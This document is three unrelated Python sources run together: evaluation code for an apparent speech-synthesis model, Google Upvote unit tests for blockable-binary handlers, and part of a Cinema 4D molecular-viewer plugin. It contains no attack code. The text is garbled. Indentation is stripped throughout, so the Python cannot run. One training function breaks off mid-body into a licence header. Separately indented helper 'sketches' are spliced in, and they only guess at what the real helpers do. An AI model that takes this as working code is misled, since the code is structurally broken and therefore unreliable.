print('========= MCD =========')
print('Evaluated aco W/O sil phones ({}) MCD [dB]:'
'{:.3f}'.format(sil_id, nosil_aco_mcd['total']))
write_scalar_log(nosil_aco_mcd['total'],
'total_MCD_dB',
epoch_idx, log_writer)
#print('Evaluated w/ sil MCD of spks: {}'.format(json.dumps(aco_mcd,
# indent=2)))
print('Evaluated W/O sil MCD of spks: {}'.format(json.dumps(nosil_aco_mcd,
indent=2)))
if len(nosil_aco_mcd) > 2:
# will print all speakers
for k, v in nosil_aco_mcd.items():
if k == 'total':
continue
write_scalar_log(v,
'MCD_spk{}_dB'.format(k),
epoch_idx, log_writer)
print('========= Acc =========')
#print('Evaluated aco AFPR [norm]: '.format(aco_afpr['A.total']))
print('Evaluated W/O sil phones ({}) Acc [norm]:'
'{}'.format(sil_id, nosil_aco_afpr['A.total']))
write_scalar_log(nosil_aco_afpr['A.total'], 'Total Accuracy',
epoch_idx, log_writer)
print('Evaluated W/O sil phones ({}) P [norm]:'
'{}'.format(sil_id, nosil_aco_afpr['P.total']))
write_scalar_log(nosil_aco_afpr['P.total'], 'Total Precision',
epoch_idx, log_writer)
print('Evaluated W/O sil phones ({}) R [norm]:'
'{}'.format(sil_id, nosil_aco_afpr['R.total']))
write_scalar_log(nosil_aco_afpr['R.total'], 'Total Recall',
epoch_idx, log_writer)
print('Evaluated W/O sil phones ({}) F1 [norm]:'
'{}'.format(sil_id, nosil_aco_afpr['F.total']))
write_scalar_log(nosil_aco_afpr['F.total'], 'total F1',
epoch_idx, log_writer)
print('=' * 30)
# WRITE AUDIO TO TBOARD if possible
if log_writer is not None:
tfl = tempfile.NamedTemporaryFile()
cc = preds[:, :40]
fv = preds[:, -3]
lf0 = preds[:, -2]
write_aco_file('{}.cc'.format(tfl.name), cc)
write_aco_file('{}.fv'.format(tfl.name), fv)
write_aco_file('{}.lf0'.format(tfl.name), lf0)
aco2wav('{}'.format(tfl.name))
rate, wav = wavfile.read('{}.wav'.format(tfl.name))
# norm in wav
wav = np.array(wav, dtype=np.float32) / 32767.
# trim to max of 10 seconds
wav = wav[:min(wav.shape[0], int(rate * 10))]
log_writer.add_audio('eval_synth_audio',
wav,
epoch_idx,
sample_rate=rate)
# remove tmp files
os.unlink('{}.cc'.format(tfl.name))
os.unlink('{}.fv'.format(tfl.name))
os.unlink('{}.lf0'.format(tfl.name))
os.unlink('{}.wav'.format(tfl.name))
#print('Evaluated w/ sil MCD of spks: {}'.format(json.dumps(aco_mcd,
# indent=2)))
#print('Evaluated w/o sil MCD of spks: {}'.format(json.dumps(nosil_aco_mcd,
# indent=2)))
#print('Evaluated w/ sil AFPR of spks: {}'.format(json.dumps(aco_afpr,
# indent=2)))
#print('Evaluated w/o sil AFPR of spks: '
# '{}'.format(json.dumps(nosil_aco_afpr,
# indent=2)))
# transform nosil_aco_mcd keys
new_keys_d = {}
for k in nosil_aco_mcd.keys():
if k == 'total':
# skip this key
continue
if mulout:
# transform each key into the desired loss filename
new_keys_d['mo-{}_va_mcd'.format(k)] = nosil_aco_mcd[k]
else:
# transform each key into the desired loss filename
new_keys_d['so-{}_va_mcd'.format(k)] = nosil_aco_mcd[k]
for k in nosil_aco_afpr.keys():
if k == 'total':
continue
if mulout:
new_keys_d['mo-{}_va_afpr'.format(k)] = nosil_aco_afpr[k]
else:
new_keys_d['so-{}_va_afpr'.format(k)] = nosil_aco_afpr[k]
for k in nosil_aco_f0_spk.keys():
if mulout:
new_keys_d['mo-{}_va_f0rmse'.format(k)] = nosil_aco_f0_spk[k]
else:
new_keys_d['so-{}_va_f0rmse'.format(k)] = nosil_aco_f0_spk[k]
new_keys_d.update({'total_aco_mcd':aco_mcd['total'],
'total_nosil_aco_mcd':nosil_aco_mcd['total'],
'total_aco_afpr':aco_afpr['total'],
'total_nosil_aco_afpr':nosil_aco_afpr['total'],
'total_aco_f0rmse':aco_f0_rmse,
'total_nosil_aco_f0rmse':nosil_aco_f0_rmse})
return new_keys_d
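# For reference: the mcd() helper used above is assumed to implement
# mel-cepstral distortion, conventionally (10/ln10)*sqrt(2*sum_d (c1_d-c2_d)^2)
# averaged over frames. A minimal sketch of that formula (the real helper also
# aggregates per speaker, which this omits):
def _mcd_sketch(preds, gtruths):
    import numpy as np  # module already imports numpy; kept local for self-containment
    diff = preds - gtruths  # [n_frames, n_cepstral_coeffs]
    K = 10.0 / np.log(10.0) * np.sqrt(2.0)  # standard MCD constant
    return float(np.mean(K * np.sqrt(np.sum(diff ** 2, axis=1))))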
def eval_dur_epoch(model, dloader, epoch_idx, cuda=False,
stats=None, va_opts={}, log_writer=None):
model.eval()
with torch.no_grad():
sil_id = 'pau'
q_classes = False
if 'sil_id' in va_opts:
sil_id = va_opts.pop('sil_id')
if 'q_classes' in va_opts:
q_classes= va_opts.pop('q_classes')
idx2spk = None
if 'idx2spk' in va_opts:
idx2spk = va_opts.pop('idx2spk')
mulout = False
if 'mulout' in va_opts:
print('Multi-Output dur evaluation')
mulout = va_opts.pop('mulout')
if idx2spk is None:
raise ValueError('Specify a idx2spk in eval opts '
'when using MO.')
assert len(va_opts) == 0, 'unrecognized params passed in: '\
'{}'.format(va_opts.keys())
spk2durstats=stats
preds = None
gtruths = None
seqlens = None
spks = None
# make the silence mask
sil_mask = None
for b_idx, batch in enumerate(dloader):
# decompose the batch into the sub-batches
spk_b, lab_b, dur_b, slen_b, ph_b = batch
# build batch of curr_ph to filter out results without sil phones
# size of curr_ph_b [bsize, seqlen]
curr_ph_b = [[ph[2] for ph in ph_s] for ph_s in ph_b]
# convert all into variables and transpose (we want time-major)
spk_b = spk_b.transpose(0,1)
lab_b = lab_b.transpose(0,1)
dur_b = dur_b.transpose(0,1)
# get curr batch size
curr_bsz = spk_b.size(1)
# init hidden states of dur model
states = model.init_hidden_state(curr_bsz)
if cuda:
spk_b = var_to_cuda(spk_b)
lab_b = var_to_cuda(lab_b)
dur_b = var_to_cuda(dur_b)
slen_b = var_to_cuda(slen_b)
states = var_to_cuda(states)
# forward through model
y, states = model(lab_b, states, speaker_idx=spk_b)
if isinstance(y, dict):
# we have a MO model, pick the right spk
spk_name = idx2spk[spk_b.cpu().data[0,0].item()]
# print('Extracting y prediction for MO spk ', spk_name)
y = y[spk_name]
y = y.squeeze(-1)
preds, gtruths, \
spks, sil_mask = predict_masked_rmse(y, dur_b, slen_b,
spk_b, curr_ph_b,
preds, gtruths,
spks, sil_mask,
sil_id,
q_classes)
# denorm with normalization stats
assert spk2durstats is not None
preds, gtruths = denorm_dur_preds_gtruth(preds, gtruths,
spks, spk2durstats,
q_classes)
write_histogram_log(preds, 'eval_preds_rmse',
epoch_idx, log_writer)
write_histogram_log(gtruths, 'eval_gtruths_rmse',
epoch_idx, log_writer)
dur_rmse, spks_rmse = rmse(preds, gtruths, spks)
dur_rmse *= 1e3
for k, v in spks_rmse.items():
spks_rmse[k] = v * 1e3
nosil_dur_rmse, \
nosil_spks_rmse = rmse(preds * sil_mask,
gtruths * sil_mask, spks)
nosil_dur_rmse *= 1e3
nosil_spkname_rmse = {}
for k, v in nosil_spks_rmse.items():
#nosil_spks_rmse[k] = v * 1e3
nosil_spkname_rmse[idx2spk[int(k)]] = v * 1e3
write_scalar_log(v * 1e3,
'eval_nosil_{}_rmse'.format(idx2spk[int(k)]),
epoch_idx, log_writer)
#print('Evaluated dur mRMSE [ms]: {:.3f}'.format(dur_rmse))
print('Evaluated dur w/o sil phones mRMSE [ms]:'
'{:.3f}'.format(nosil_dur_rmse))
print('Evaluated dur of spks: {}'.format(json.dumps(nosil_spkname_rmse,
indent=2)))
nosil_spkname_rmse.update({'eval_total_dur_rmse':dur_rmse,
'eval_total_nosil_dur_rmse':nosil_dur_rmse})
write_scalar_log(dur_rmse,
'eval_total_dur_rmse',
epoch_idx, log_writer)
write_scalar_log(nosil_dur_rmse,
'eval_total_nosil_dur_rmse',
epoch_idx, log_writer)
return nosil_spkname_rmse
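# repackage_hidden() used above is assumed to detach recurrent states from
# the autograd graph and trim them to the current batch size; a minimal
# sketch under that assumption (not the project's actual helper):
def _repackage_hidden_sketch(h, curr_bsz):
    import torch  # the module is assumed to import torch already
    if isinstance(h, torch.Tensor):
        # [num_layers, batch, hidden] -> detached and sliced to current batch
        return h.detach()[:, :curr_bsz, :].contiguous()
    return tuple(_repackage_hidden_sketch(v, curr_bsz) for v in h)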
def train_attaco_epoch(model, dloader, opt, log_freq, epoch_idx,
criterion=None, cuda=False, tr_opts={},
spk2acostats=None, log_writer=None):
model.train()
global_step = epoch_idx * len(dloader)
# At the moment, acoustic training is always stateful
spk2acostats = None
if 'spk2acostats' in tr_opts:
print('Getting spk2acostats')
spk2acostats = tr_opts.pop('spk2acostats')
idx2spk = None
if 'idx2spk' in tr_opts:
idx2spk = tr_opts.pop('idx2spk')
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for blockable handlers."""
import datetime
import httplib
import mock
import webapp2
from google.appengine.ext import ndb
from upvote.gae.datastore import test_utils
from upvote.gae.datastore import utils
from upvote.gae.datastore.models import base
from upvote.gae.datastore.models import bit9
from upvote.gae.datastore.models import santa
from upvote.gae.modules.upvote_app.api.handlers import blockables
from upvote.gae.shared.common import basetest
from upvote.shared import constants
class BlockablesTest(basetest.UpvoteTestCase):
"""Base class for Audit Logs handler tests."""
def setUp(self, app):
super(BlockablesTest, self).setUp(wsgi_app=app)
self.bit9_blockable = test_utils.CreateBit9Binary(
id='zzzzzzzzzaaa',
id_type=constants.ID_TYPE.SHA256,
file_name='Mac.app.exe')
self.bit9_blockable2 = test_utils.CreateBit9Binary(
id='zzzzzzzzzbbb',
id_type=constants.ID_TYPE.SHA256,
file_name='app.exe')
self.generic_blockable = test_utils.CreateBlockable(
file_name='Not4Mac.exe',
state=constants.STATE.SUSPECT)
self.santa_blockable = test_utils.CreateSantaBlockable(
publisher='Arple',
product_name='New Shiny',
flagged=True)
self.santa_certificate = test_utils.CreateSantaCertificate(
id_type=constants.ID_TYPE.SHA256,
common_name='Best Cert Ever',
organization='Totally Legit CA')
self.PatchValidateXSRFToken()
class BlockableQueryHandlerTest(BlockablesTest):
def setUp(self):
app = webapp2.WSGIApplication([
webapp2.Route('/<platform>/<blockable_type>',
handler=blockables.BlockableQueryHandler)])
super(BlockableQueryHandlerTest, self).setUp(app)
def testAdminGetList(self):
"""Admin getting list of all blockables."""
with self.LoggedInUser(admin=True):
response = self.testapp.get('/all/all')
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 5)
def testAdminGetListWithPlatform(self):
"""Admin getting list of all blockables on a specific platform."""
with self.LoggedInUser(admin=True):
response = self.testapp.get('/santa/certificates')
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 1)
def testUserGetBlockableList(self):
"""Normal user getting a list of all blockables."""
with self.LoggedInUser():
self.testapp.get('/all/all', status=httplib.FORBIDDEN)
def testUserGetFlaggedBlockables(self):
"""Normal user getting a list of flagged blockables."""
params = {'filter': 'flagged'}
with self.LoggedInUser():
self.testapp.get('/all/all', params, status=httplib.FORBIDDEN)
def testUserGetSuspectBlockables(self):
"""Normal user getting a list of suspect blockables."""
params = {'filter': 'suspect'}
with self.LoggedInUser():
self.testapp.get('/all/all', params, status=httplib.FORBIDDEN)
def testUserGetOwnBlockables(self):
user_1 = test_utils.CreateUser()
user_2 = test_utils.CreateUser()
# Create two events for this user.
test_utils.CreateBit9Event(
self.bit9_blockable,
executing_user=user_2.nickname,
host_id='a_host_id',
parent=utils.ConcatenateKeys(
user_2.key, ndb.Key('Host', 'a_host_id'),
self.santa_blockable.key)
)
host_id = 'AAAAAAAA-1111-BBBB-2222-CCCCCCCCCCCC'
test_utils.CreateSantaEvent(
self.santa_blockable,
executing_user=user_2.nickname,
event_type=constants.EVENT_TYPE.ALLOW_UNKNOWN,
file_name='Product.app',
file_path='/Applications/Product.app/Contents/MacOs',
host_id=host_id,
last_blocked_dt=datetime.datetime(2015, 4, 1, 1, 0, 0),
first_blocked_dt=datetime.datetime(2015, 4, 1, 1, 0, 0),
parent=utils.ConcatenateKeys(
user_2.key, ndb.Key('Host', host_id),
self.santa_blockable.key)
)
# Create one event for another user. This should not be included in
# the results when fetching blockables for user_2.
test_utils.CreateBit9Event(
self.bit9_blockable2,
executing_user=user_1.nickname,
file_name='notepad++.exe',
file_path=r'c:\program files (x86)\notepad++',
host_id='a_host_id',
last_blocked_dt=datetime.datetime(2015, 5, 1, 1, 0, 0),
first_blocked_dt=datetime.datetime(2015, 5, 1, 1, 0, 0),
parent=utils.ConcatenateKeys(
user_1.key, ndb.Key('Host', 'a_host_id'),
self.santa_blockable.key)
)
params = {'filter': 'own'}
with self.LoggedInUser(user=user_2):
response = self.testapp.get('/all/all', params)
output = response.json
# Verify that only two blockables (from the two events) are returned to
# this user.
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 2)
def testUserGetOwnBlockables_UserHasNoBlockables(self):
params = {'filter': 'own'}
with self.LoggedInUser():
response = self.testapp.get('/all/all', params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 0)
def testAdminGetListOfFlaggedBlockables(self):
"""Admin getting a list of flagged blockables."""
params = {'filter': 'flagged'}
with self.LoggedInUser(admin=True):
response = self.testapp.get('/all/all', params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 1)
def testAdminGetListOfSuspectBlockables(self):
"""Admin getting a list of flagged blockables."""
params = {'filter': 'suspect'}
with self.LoggedInUser(admin=True):
response = self.testapp.get('/all/all', params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 1)
def testAdminGetQueryByFileName(self):
"""Admin searching for a blockable by filename."""
params = {'search': 'Not4Mac.exe', 'searchBase': 'fileName'}
with self.LoggedInUser(admin=True):
response = self.testapp.get('/all/all', params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 1)
def testAdminGetQueryByPublisher(self):
"""Admin searching for a blockable by filename."""
params = {'search': 'Arple', 'searchBase': 'publisher'}
with self.LoggedInUser(admin=True):
response = self.testapp.get('/all/all', params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 1)
def testAdminGetQueryByProductName(self):
"""Admin searching for a blockable by filename."""
params = {'search': 'New Shiny', 'searchBase': 'productName'}
with self.LoggedInUser(admin=True):
response = self.testapp.get('/all/all', params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 1)
def testAdminGetQueryPlatform(self):
"""Admin searching for a blockable by platform."""
params = {'search': 'New Shiny', 'searchBase': 'productName'}
with self.LoggedInUser(admin=True):
response = self.testapp.get('/santa/binaries', params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertIsInstance(output['content'], list)
self.assertEqual(len(output['content']), 1)
def testAdminGetQueryByUnknown(self):
"""Admin searching for a blockable by an unknown property."""
params = {'search': 'ProbablyNotReal', 'searchBase': 'notReal'}
with self.LoggedInUser(admin=True):
self.testapp.get('/all/all', params, status=httplib.BAD_REQUEST)
def testAdminGetQueryBadPlatform(self):
"""Admin searching by a property not valid for the specified platform."""
params = {'search': 'DoesntMatter', 'searchBase': 'bundle_id'}
with self.LoggedInUser(admin=True):
self.testapp.get('/bit9/binaries', params, status=httplib.BAD_REQUEST)
class BlockableHandlerTest(BlockablesTest):
def setUp(self):
app = webapp2.WSGIApplication(
[webapp2.Route('/<blockable_id>',
handler=blockables.BlockableHandler)])
super(BlockableHandlerTest, self).setUp(app)
def testUserGetGenericByID(self):
"""Normal user querying for a blockable by hash."""
with self.LoggedInUser():
response = self.testapp.get('/' + self.generic_blockable.key.id())
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertEqual(output['fileName'], self.generic_blockable.file_name)
self.assertIsNone(output.get('operating_system_family'))
self.assertIn('Blockable', output['class_'])
def testUserGetSantaBlockableByID(self):
"""Normal user querying for a blockable by hash."""
with self.LoggedInUser():
response = self.testapp.get('/' + self.santa_blockable.key.id())
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertEqual(output['fileName'], self.santa_blockable.file_name)
self.assertEqual(
output['operatingSystemFamily'], constants.PLATFORM.MACOS)
self.assertIn('Blockable', output['class_'])
self.assertIn('SantaBlockable', output['class_'])
def testUserGetBit9BinaryByID(self):
"""Normal user querying for a blockable by hash."""
with self.LoggedInUser():
response = self.testapp.get('/' + self.bit9_blockable.key.id())
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertEqual(output['id'], self.bit9_blockable.key.id())
self.assertEqual(output['fileName'], self.bit9_blockable.file_name)
self.assertEqual(
output['operatingSystemFamily'], constants.PLATFORM.WINDOWS)
self.assertIn('Blockable', output['class_'])
self.assertIn('Bit9Binary', output['class_'])
def testUserGetSantaCertificateByID(self):
"""Normal user querying for a cert by hash."""
with self.LoggedInUser():
response = self.testapp.get('/' + self.santa_certificate.key.id())
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertEqual(
output['commonName'], self.santa_certificate.common_name)
self.assertIn('Blockable', output['class_'])
self.assertIn('SantaCertificate', output['class_'])
def AddBlockableToDatastore(self, *args):
test_utils.CreateSantaBlockable(id='NotYetSynced')
return mock.Mock(status_code=httplib.OK)
def testUserGetUnknownId_Santa(self):
with self.LoggedInUser():
self.testapp.get('/Nonexistent', status=httplib.NOT_FOUND)
def testAdminPostCallRecount(self):
"""Admin requesting a recount for a blockable."""
# Create an anomalous global blacklist rule that should be deactivated by
# the recount.
rule = test_utils.CreateSantaRule(self.santa_blockable.key)
self.assertTrue(rule.in_effect)
id_ = self.santa_blockable.key.id()
params = {'recount': 'recount'}
with self.LoggedInUser(admin=True):
response = self.testapp.post('/' + id_, params)
self.assertFalse(rule.key.get().in_effect)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertIsInstance(output, dict)
self.assertEqual(output['fileName'], self.santa_blockable.file_name)
self.assertIn('Blockable', output['class_'])
def testAdminPostReset(self):
"""Admin requesting a blockable be reset."""
id_ = self.generic_blockable.key.id()
params = {'reset': 'reset'}
with self.LoggedInUser(admin=True):
with mock.patch.object(
blockables.BlockableHandler, '_reset_blockable') as mock_method:
_ = self.testapp.post('/' + id_, params)
mock_method.assert_called_once_with(id_)
def testAdminPostInsertUnknownType(self):
"""Admin tries to inject a blockable of unknown type."""
id_ = 'qqqqrrrrsssstttt'
params = {'type': 'mock_blockable', 'hash': id_}
with mock.patch.object(blockables, 'model_mapping') as mock_mapping:
mock_mapping.BlockableTypeModelMap.mock_blockable = None
with self.LoggedInUser(admin=True):
self.testapp.post('/' + id_, params, status=httplib.BAD_REQUEST)
def testAdminPostInsertExistingID(self):
"""Admin tries to inject an existing blockable."""
id_ = self.generic_blockable.key.id()
params = {'type': 'Blockable', 'hash': id_}
with mock.patch.object(blockables, 'model_mapping'):
with self.LoggedInUser(admin=True):
self.testapp.post('/' + id_, params, status=httplib.CONFLICT)
def testAdminPostInsert(self):
"""Admin posting a valid blockable."""
id_ = 'qqqqrrrrsssstttt'
params = {
'type': constants.BLOCKABLE_TYPE.SANTA_BINARY,
'fileName': 'MacIIci.app',
'publisher': 'Arple'}
mock_model = mock.MagicMock()
mock_model.get_by_id.return_value = False
test_blockable = test_utils.CreateBlockable(id=id_)
mock_model.get_or_insert.return_value = test_blockable
with mock.patch.object(blockables, 'model_mapping') as mock_mapping:
mock_mapping.BlockableTypeModelMap.SANTA_BINARY = mock_model
with self.LoggedInUser(admin=True):
response = self.testapp.post('/%s' % id_, params)
output = response.json
self.assertIn('application/json', response.headers['Content-type'])
self.assertEqual(output['id'], 'qqqqrrrrsssstttt')
mock_model.get_or_insert.assert_called_with(
'qqqqrrrrsssstttt',
file_name='MacIIci.app',
publisher='Arple',
flagged=False,
id_type=constants.ID_TYPE.SHA256
)
def testAdminPostInsert_Note(self):
"""Admin posting a valid blockable."""
id_ = 'qqqqrrrrsssstttt'
params = {
'notes': 'foo',
'fileName': 'bar',
'type': constants.BLOCKABLE_TYPE.SANTA_BINARY}
with self.LoggedInUser(admin=True):
self.testapp.post('/%s' % id_, params)
blockable = base.Blockable.get_by_id(id_)
self.assertEqual('bar', blockable.file_name)
self.assertEntityCount(base.Note, 1)
note = base.Note.query().fetch()[0]
self.assertEqual(note.message, 'foo')
self.assertEqual(note.key.parent(), blockable.key)
def testResetBlockable(self):
"""Test private reset method."""
# Create a vote and trigger a recount on the blockable to update the score.
test_utils.CreateVote(self.santa_blockable)
self.santa_blockable.put()
# Ensure Vote properly updated the blockable score.
with self.LoggedInUser(admin=True):
response = self.testapp.get('/%s' % self.santa_blockable.key.id())
output = response.json
self.assertEqual(output['id'], self.santa_blockable.key.id())
self.assertEqual(output['score'], 1)
# Issue a reset and ensure the resulting score is 0.
params = {'reset': 'reset'}
response = self.testapp.post(
'/%s' % self.santa_blockable.key.id(), params)
output = response.json
self.assertEqual(output['id'], self.santa_blockable.key.id())
self.assertEqual(output['score'], 0)
class AuthorizedHostCountHandlerTest(BlockablesTest):
def setUp(self):
app = webapp2.WSGIApplication(
[webapp2.Route(r'/<blockable_id>',
handler=blockables.AuthorizedHostCountHandler)])
super(AuthorizedHostCountHandlerTest, self).setUp(app)
def testGloballyWhitelisted(self):
self.santa_blockable.state = constants.STATE.GLOBALLY_WHITELISTED
self.santa_blockable.put()
with self.LoggedInUser(admin=True):
response = self.testapp.get('/%s' % self.santa_blockable.key.id())
output = response.json
self.assertEqual(-1, output)
def testNone(self):
with self.LoggedInUser(admin=True):
response = self.testapp.get('/%s' % self.santa_blockable.key.id())
output = response.json
self.assertEqual(0, output)
def testNormal(self):
expected = 3
for i in xrange(expected):
test_utils.CreateSantaRule(
self.santa_blockable.key,
policy=constants.RULE_POLICY.WHITELIST,
host_id='host%s' % i)
test_utils.CreateSantaRule(
self.santa_blockable.key,
policy=constants.RULE_POLICY.BLACKLIST)
test_utils.CreateSantaRule(
self.santa_blockable.key,
policy=constants.RULE_POLICY.WHITELIST,
in_effect=False)
with self.LoggedInUser(admin=True):
response = self.testapp.get('/%s' % self.santa_blockable.key.id())
output = response.json
self.assertEqual(expected, output)
def testBlockableNotFound(self):
with self.LoggedInUser(admin=True):
self.testapp.get('/NotARealBlockable', status=httplib.NOT_FOUND)
def testBadBlockableType(self):
with self.LoggedInUser(admin=True):
self.testapp.get(
'/%s' % self.bit9_blockable.key.id(), status=httplib.BAD_REQUEST)
def testNoPermission(self):
with self.LoggedInUser():
self.testapp.get(
'/%s' % self.santa_blockable.key.id(), status=httplib.FORBIDDEN)
class UniqueEventCountHandlerTest(BlockablesTest):
def setUp(self):
app = webapp2.WSGIApplication(
[webapp2.Route(r'/<blockable_id>',
handler=blockables.UniqueEventCountHandler)])
super(UniqueEventCountHandlerTest, self).setUp(app)
def testBinary_Normal(self):
test_utils.CreateSantaEvent(self.santa_blockable)
with self.LoggedInUser():
response = self.testapp.get('/%s' % self.santa_blockable.key.id())
output = response.json
self.assertEqual(1, output)
def testCert_Normal(self):
test_utils.CreateSantaEvent(
self.santa_blockable,
cert_sha256=self.santa_certificate.key.id())
with self.LoggedInUser():
response = self.testapp.get('/%s' % self.santa_certificate.key.id())
output = response.json
self.assertEqual(1, output)
#!/usr/bin/python
#TODO
#symserv == cloner Object: linear for helix, radial for symNFold
#how to communicate this with pmv....like vision ... only ever need node name/log or matrice
#color By vertex!!
#C4d module
import c4d
import c4d.symbols as sy
#import c4d.documents
#import c4d.plugins
#from c4d import plugins
#from c4d import tools
#from c4d.gui import *
#from c4d.plugins import *
#standardmodule
import numpy
import numpy.oldnumeric as Numeric
import sys, os, os.path, struct, math, string
import types
import math
from math import *
from types import StringType, ListType
#this id can probably found in c4d.symbols
#TAG ID
POSEMIXER = 100001736
IK = 1019561
PYTAG = 1022749
Follow_PATH = 5699
LOOKATCAM = 1001001
SUNTAG=5678
#OBJECT ID
INSTANCE = 5126
BONE = 1019362
CYLINDER = 5170
CIRCLE = 5181
RECTANGLE = 5186
FOURSIDE = 5180
LOFTNURBS= 5107
SWEEPNURBS=5118
TEXT = 5178
CLONER = 1018544
MOINSTANCE = 1018957
ATOMARRAY = 1001002
METABALLS = 5125
LIGHT = 5102
CAMERA = 5103
#PARAMS ID
PRIM_SPHERE_RAD = 1110
#MATERIAL ATTRIB
LAYER=1011123
GRADIANT=1011100
FUSION = 1011109
#COMMAND ID
OPTIMIZE = 14039
VERBOSE=0
DEBUG=0
#MGLTOOLS module
import MolKit
from MolKit.molecule import Atom, AtomSet, BondSet, Molecule , MoleculeSet
from MolKit.protein import Protein, ProteinSet, Residue, Chain, ResidueSet,ResidueSetSelector
from MolKit.stringSelector import CompoundStringSelector
from MolKit.tree import TreeNode, TreeNodeSet
from MolKit.molecule import Molecule, Atom
from MolKit.protein import Residue
#PMV module
from Pmv.moleculeViewer import MoleculeViewer
from Pmv.displayCommands import BindGeomToMolecularFragment
from Pmv.trajectoryCommands import PlayTrajectoryCommand
#Pmv Color Palette
from Pmv.pmvPalettes import AtomElements
from Pmv.pmvPalettes import DavidGoodsell, DavidGoodsellSortedKeys
from Pmv.pmvPalettes import RasmolAmino, RasmolAminoSortedKeys
from Pmv.pmvPalettes import Shapely
from Pmv.pmvPalettes import SecondaryStructureType
from Pmv.pmvPalettes import DnaElements
#computation
#from Pmv.amberCommands import Amber94Config, CurrentAmber94
from Pmv.hostappInterface import comput_util as C
from Pmv.hostappInterface import cinema4d as epmvc4d
plugDir=epmvc4d.__path__[0]
SSShapes={ 'Heli':FOURSIDE,
'Shee':RECTANGLE,
'Coil':CIRCLE,
'Turn':CIRCLE,
'Stra':RECTANGLE
}
SSColor={ 'Heli':(238,0,127),
'Shee':(243,241,14),
'Coil':(255,255,255),
'Turn':(60,26,100),
'Stra':(255,255,0)}
#NOTES
#[900] <-> SetName
AtmRadi = {"A":"1.7","N":"1.54","C":"1.7","CA":"1.7","O":"1.52","S":"1.85","H":"1.2","P" : "1.04"}
DGatomIds=['ASPOD1','ASPOD2','GLUOE1','GLUOE2', 'SERHG',
'THRHG1','TYROH','TYRHH',
'LYSNZ','LYSHZ1','LYSHZ2','LYSHZ3','ARGNE','ARGNH1','ARGNH2',
'ARGHH11','ARGHH12','ARGHH21','ARGHH22','ARGHE','GLNHE21',
'GLNHE22','GLNHE2',
'ASNHD2','ASNHD21', 'ASNHD22','HISHD1','HISHE2' ,
'CYSHG', 'HN']
def lookupDGFunc(atom):
assert isinstance(atom, Atom)
if atom.name in ['HN']:
atom.atomId = atom.name
else:
atom.atomId=atom.parent.type+atom.name
if atom.atomId not in DGatomIds:
atom.atomId=atom.element
if atom.atomId not in AtmRadi.keys() : atom.atomId="A"
return atom.atomId
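# Example: a CYS gamma hydrogen named HG maps to atomId 'CYSHG' (present in
# DGatomIds); an atom whose type+name combination is unknown falls back to
# its element, and finally to "A" if the element has no entry in AtmRadi.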
ResidueSelector=ResidueSetSelector()
def start(debug=0):
if VERBOSE : print "start ePMV - debug ",debug
mv = MoleculeViewer(logMode = 'unique', customizer=None, master=None,title='pmv', withShell= 0,verbose=False, gui = False)
mv.addCommand(BindGeomToMolecularFragment(), 'bindGeomToMolecularFragment', None)
mv.browseCommands('trajectoryCommands',commands=['openTrajectory'],log=0,package='Pmv')
#mv.browseCommands('amberCommands',package='Pmv')
mv.addCommand(PlayTrajectoryCommand(),'playTrajectory',None)
mv.embedInto('c4d',debug=debug)
mv.userpref['Read molecules as']['value']='conformations'
#DEBUG=debug
return mv
def reset_ePMV(mv, debug=0):
#need to restore the logEvent sytem for the right session
if VERBOSE : print "reset epmv debug",debug,mv
mv.embedInto('c4d',debug=debug)
def progressBar(progress,label):
#the progessbar use the StatusSetBar
c4d.StatusSetText(label)
c4d.StatusSetBar(int(progress*100.))
def resetProgressBar(value):
c4d.StatusClear()
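# Usage sketch (hypothetical values): progress is a 0..1 fraction that
# StatusSetBar() displays as a percentage.
#   progressBar(0.5, "parsing molecule")   # status bar at 50%
#   resetProgressBar(0)                    # clears the status bar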
def compareSel(currentSel,molSelDic):
for selname in molSelDic.keys():
if VERBOSE : print "The compareSelection ",currentSel,molSelDic[selname][3]
#if currentSel[-1] == ';' : currentSel=currentSel[0:-1]
if currentSel == molSelDic[selname][3] : return selname
def parseObjectName(o):
#problem if "_" exists in the molecule name
if type(o) == str : name=o
else : name=o.GetName()
tmp=name.split("_")
if len(tmp) == 1 : #no "_" so not cpk (S_) or ball (B_) stick (T_) or Mesh (Mesh_)
return ""
else :
if tmp[0] == "S" or tmp[0] == "B" : #balls or cpk
hiearchy=tmp[1].split(":") #B_MOL:CHAIN:RESIDUE:ATOMS
return hiearchy
return ""
def parseName(o):
if type(o) == str : name=o
else : name=o.GetName()
